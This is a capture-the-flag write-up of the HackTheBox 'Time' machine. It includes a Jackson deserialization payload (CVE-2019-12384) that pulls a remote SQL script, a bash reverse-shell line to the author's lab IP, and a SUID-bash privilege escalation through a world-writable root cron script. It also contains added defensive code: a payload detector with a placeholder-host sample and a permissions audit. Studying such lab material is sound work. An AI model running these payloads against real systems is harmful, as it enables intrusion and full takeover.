HackTheBox - Time write up

Time is a Medium Linux box.

Recon

As always, let's start with an nmap scan.

$ nmap -p- -A -T4 -oN scan.nmap 10.10.10.214

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 and 80.

Web

http://10.10.10.214/index.php

The page offers two JSON tools, a Beautifier and a Validator. The Validator is marked as beta, so let's stress it.

Submitting the JSON {"": ""} triggers an unhandled exception:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

So the JSON is parsed by the Jackson library (com.fasterxml.jackson), and the message "need JSON Array to contain As.WRAPPER_ARRAY type information" also tells us that polymorphic default typing is enabled, i.e. the parser accepts a class name as the first element of an array. Let's find a CVE!

After some research and a few failed attempts, I found that the application is vulnerable to CVE-2019-12384. The vulnerability is well explained on this blog, and I used this exploit from GitHub to get RCE (Remote Code Execution).

I send this JSON payload:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.138:4444/inject.sql'"}]

This tells the web application to run the script inject.sql fetched from a remote server (10.10.14.138 is my machine). inject.sql looks like this:

-- H2 lets a RUNSCRIPT file define a Java-backed SQL function (ALIAS) inline
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
-- Calling the alias runs the command with the web application's privileges
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.138/1337 0>&1')

It is written for the H2 database; here it spawns a bash reverse shell that connects back to my machine.
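From the defender's side, the interesting property of this payload is its shape: a top-level JSON array whose first element is a fully qualified Java class name and whose second element is that class's properties (Jackson's As.WRAPPER_ARRAY encoding), plus a JDBC URL carrying an H2 INIT=RUNSCRIPT clause. The following request-body inspection heuristic is an added example, not code from the write-up or from the box; it could sit in a WAF rule, a reverse-proxy filter, or a log-review script. The gadget class name is the one shown above; the host in the constructed sample is a placeholder.

```python
import json
import re

# A fully qualified Java class name: dotted lowercase-ish packages, capitalised class.
JAVA_FQCN = re.compile(r"^(?:[a-zA-Z_$][\w$]*\.)+[A-Z][\w$]*$")

# Gadget class demonstrated on this page (CVE-2019-12384). Extend this set from
# your own dependency audit; it is illustrative, not exhaustive.
KNOWN_GADGETS = {
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
}

# Substrings that make an H2 JDBC URL execute SQL at connection time.
H2_INIT_MARKERS = ("INIT=", "RUNSCRIPT")


def _walk_strings(node):
    """Yield every string value in a parsed JSON document, at any depth."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for v in node.values():
            yield from _walk_strings(v)
    elif isinstance(node, list):
        for v in node:
            yield from _walk_strings(v)


def inspect_payload(raw: str) -> dict:
    """Classify one JSON request body.

    Returns {"suspicious": bool, "reasons": [str, ...]}. Invalid JSON is not
    suspicious by itself; the parser will reject it before any type hint is honoured.
    """
    reasons = []
    try:
        doc = json.loads(raw)
    except ValueError:
        return {"suspicious": False, "reasons": ["not valid JSON"]}

    # WRAPPER_ARRAY shape: ["fully.qualified.ClassName", {...properties...}]
    if isinstance(doc, list) and len(doc) == 2 and isinstance(doc[0], str):
        cls = doc[0]
        if cls in KNOWN_GADGETS:
            reasons.append(f"known gadget class {cls}")
        elif JAVA_FQCN.match(cls) and isinstance(doc[1], dict):
            reasons.append(f"WRAPPER_ARRAY type hint for class {cls}")

    # A JDBC URL has no business in user-supplied JSON; an H2 INIT clause is worse.
    for value in _walk_strings(doc):
        if value.lower().startswith("jdbc:"):
            upper = value.upper()
            if any(m in upper for m in H2_INIT_MARKERS):
                reasons.append("JDBC URL with H2 INIT/RUNSCRIPT clause")
            else:
                reasons.append("JDBC URL in user-supplied JSON")

    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed sample bodies (not captured traffic); the host is a placeholder.
SAMPLES = {
    "gadget": '["ch.qos.logback.core.db.DriverManagerConnectionSource", '
              '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
              'INIT=RUNSCRIPT FROM \'http://ATTACKER_HOST_PLACEHOLDER/inject.sql\'"}]',
    "benign": '{"name": "alice", "tags": ["a", "b"]}',
    "empty_key": '{"": ""}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_payload(body))
```

A filter like this only buys time. The actual fix is on the application side: do not enable default typing on the ObjectMapper, or on Jackson 2.10+ use activateDefaultTyping with a PolymorphicTypeValidator allowlist (BasicPolymorphicTypeValidator) so that only expected subtypes can be named in input, and keep jackson-databind and the libraries that ship gadget classes up to date. Also note that the Validator's verbose error text is what disclosed the parser and its configuration in the first place; returning a generic validation error would have removed that hint.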

xanhacks~ $ nc -lvnp 1337
Connection from 10.10.10.214:42760
bash: cannot set terminal process group (943): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:/var/www/html$ cd /home/pericles
pericles@time:/home/pericles$ cat user.txt
eb754b95f8a294c4dc6a...

We get a shell and the user.txt flag!

Root

After enumerating the box, I found a homemade shell script in /usr/bin.

$ ls -al /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Dec 27 21:50 /usr/bin/timer_backup.sh

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

I tried to find the cron job that runs this script, but we do not have enough permissions to read root's crontab. So I uploaded pspy to the box to snoop on processes without needing root.

pericles@time:/tmp$ wget 10.10.14.138:4444/pspy64s
wget 10.10.14.138:4444/pspy64s
--2020-12-27 21:59:24--  http://10.10.14.138:4444/pspy64s
Connecting to 10.10.14.138:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’

pspy64s             100%[===================>]   1.10M   100KB/s    in 12s     

2020-12-27 21:59:35 (97.8 KB/s) - ‘pspy64s’ saved [1156536/1156536]

pericles@time:/tmp$ chmod +x pspy64s

pericles@time:/tmp$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
...
2020/12/27 22:00:31 CMD: UID=0    PID=138631 | zip -r website.bak.zip /var/www/html
...

Every ten seconds the command inside /usr/bin/timer_backup.sh is executed by root (UID=0). The script is owned by pericles and world-writable, so we can replace its content with our own command.

echo '#!/bin/bash' > /usr/bin/timer_backup.sh
echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /usr/bin/timer_backup.sh

Wait ten seconds for the job to fire, then run the SUID copy of bash with -p so it keeps the effective root uid:

pericles@time:/tmp$ /tmp/bash -p
bash-5.0# id
uid=1000(pericles) gid=1000(pericles) euid=0(root) groups=1000(pericles)
bash-5.0# cat /root/root.txt 
63e4c1b6a0b8b314d47a8...

Rooted!
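The root cause here is a classic one: a job that runs as root executes a script that a non-root user owns and that is world-writable. The audit below is an added example (not part of the write-up) that checks a script, and its parent directory, for exactly that condition; the pure function works on stat fields so it can be tested without real files, and demo() rebuilds the page's mode bits (-rwxrw-rw-) on a constructed copy of timer_backup.sh in a temporary directory.

```python
import os
import stat
import tempfile
from typing import List, Tuple

Finding = Tuple[str, str]  # (path, reason)


def writable_by_non_root(st_mode: int, st_uid: int, st_gid: int) -> List[str]:
    """Reasons a file with these stat values could be modified by a non-root user.

    Pure function over stat fields so it is easy to test without a filesystem.
    """
    reasons = []
    if st_uid != 0:
        reasons.append(f"owned by uid {st_uid}, not root")
    if st_mode & stat.S_IWGRP and st_gid != 0:
        reasons.append(f"group-writable by gid {st_gid}")
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_script(path: str) -> List[Finding]:
    """Check a script that a root cron/timer job runs, plus its parent directory.

    A writable parent directory is flagged too, because it lets anyone replace
    the file wholesale even when the file itself is root-owned and 0755.
    """
    findings: List[Finding] = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append((path, "is a symlink"))
    for reason in writable_by_non_root(st.st_mode, st.st_uid, st.st_gid):
        findings.append((path, reason))

    parent = os.path.dirname(os.path.abspath(path))
    pst = os.lstat(parent)
    for reason in writable_by_non_root(pst.st_mode, pst.st_uid, pst.st_gid):
        findings.append((parent, f"parent directory {reason}"))
    return findings


def demo() -> List[Finding]:
    """Constructed reproduction of the misconfiguration from the box, in a temp dir."""
    d = tempfile.mkdtemp(prefix="audit_demo_")
    script = os.path.join(d, "timer_backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n"
                "zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip\n")
    os.chmod(script, 0o766)  # -rwxrw-rw-, the mode shown in the write-up
    return audit_script(script)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Running demo() reports the script as world-writable (and, unless you run it as root, owned by a non-root uid, which is the other half of the problem on the box). The fix on the target would be chown root:root and chmod 0755 on the script, in a directory that is itself root-owned and not group- or world-writable, and the same rule applied to anything a root cron job or systemd timer executes. pspy-style process snooping by an unprivileged user is not itself a vulnerability, but it is a reminder that cron and timer activity is visible to any local account; hide nothing in the command line that you would not want a local user to read.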
